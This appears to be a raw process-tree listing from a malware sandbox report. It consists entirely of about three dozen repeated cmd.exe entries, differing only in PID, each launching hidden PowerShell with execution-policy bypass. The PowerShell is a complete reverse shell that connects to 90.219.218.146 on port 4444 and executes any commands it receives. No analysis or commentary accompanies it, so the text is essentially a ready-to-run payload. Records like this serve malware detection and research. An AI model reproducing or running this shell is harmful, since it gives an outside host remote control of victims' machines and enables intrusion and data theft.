C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2224
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3592
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3216
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1544
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4652
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4456
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:5064
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1068
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3448
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3576
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1228
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4536
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:380
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4592
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:540
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1184
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:432
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1080
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3796
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4132
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3500
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4136
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4556
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1160
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2692
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:828
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2440
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2552
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4920
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1680
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4392
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:648
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1532
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2324
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:336
-
-
